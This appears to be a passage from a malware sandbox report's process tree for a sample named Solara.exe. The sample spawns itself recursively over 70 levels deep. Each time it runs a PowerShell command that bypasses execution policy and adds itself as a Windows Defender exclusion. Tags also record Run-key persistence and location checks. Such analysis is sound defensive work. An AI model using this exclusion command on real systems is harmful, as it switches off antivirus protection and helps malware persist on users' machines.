        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        8⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        9⤵
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        10⤵
        
        PID:3388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        11⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        12⤵
        
        PID:1124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        13⤵
        
        PID:4048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        14⤵
        Adds Run key to start application
        
        PID:4584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:512
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        15⤵
        Adds Run key to start application
        
        PID:3092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        16⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        16⤵
        Checks computer location settings
        
        PID:1572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        17⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        17⤵
        Adds Run key to start application
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        18⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        18⤵
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        19⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        19⤵
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        20⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        20⤵
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        21⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        21⤵
        Checks computer location settings
        
        PID:2888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        22⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        22⤵
        Adds Run key to start application
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        23⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        23⤵
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        24⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        24⤵
        
        PID:4696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        25⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        25⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        26⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        26⤵
        
        PID:4584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        27⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        27⤵
        
        PID:4152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        28⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        28⤵
        Checks computer location settings
        
        PID:2744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        29⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        29⤵
        
        PID:732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        30⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        30⤵
        
        PID:1376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        31⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        31⤵
        Adds Run key to start application
        
        PID:4360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        32⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        32⤵
        Checks computer location settings
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        33⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        33⤵
        
        PID:4328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        34⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        34⤵
        
        PID:3396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        35⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        35⤵
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        36⤵
        
        PID:688
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        36⤵
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        37⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        37⤵
        Checks computer location settings
        
        PID:1444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        38⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        38⤵
        Checks computer location settings
        
        PID:3192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        39⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        39⤵
        
        PID:3496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        40⤵
        
        PID:3212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        41⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        41⤵
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        42⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        42⤵
        
        PID:4996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        43⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        43⤵
        
        PID:3464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        44⤵
        
        PID:5072
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        44⤵
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        45⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        45⤵
        
        PID:4848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        46⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        46⤵
        Adds Run key to start application
        
        PID:4684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        47⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        47⤵
        Checks computer location settings
        
        PID:1792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        48⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        48⤵
        
        PID:464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        49⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        49⤵
        
        PID:4584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        50⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        50⤵
        Checks computer location settings
        
        PID:4496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        51⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        51⤵
        
        PID:740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        52⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        52⤵
        Adds Run key to start application
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        53⤵
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        53⤵
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        54⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        54⤵
        
        PID:4052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        55⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        55⤵
        
        PID:3520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        56⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        56⤵
        Checks computer location settings
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        57⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        57⤵
        
        PID:4620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        58⤵
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        58⤵
        Adds Run key to start application
        
        PID:4368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        59⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        59⤵
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        60⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        60⤵
        Adds Run key to start application
        
        PID:4732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        61⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        61⤵
        Checks computer location settings
        
        PID:3492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        62⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        62⤵
        Adds Run key to start application
        
        PID:724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        63⤵
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        63⤵
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        64⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        64⤵
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        65⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        65⤵
        
        PID:1800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        66⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        66⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        67⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        67⤵
        
        PID:4540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        68⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        68⤵
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        69⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        69⤵
        Adds Run key to start application
        
        PID:4084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        70⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        70⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        71⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        71⤵
        Checks computer location settings
        
        PID:1572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        72⤵
        
        PID:5016
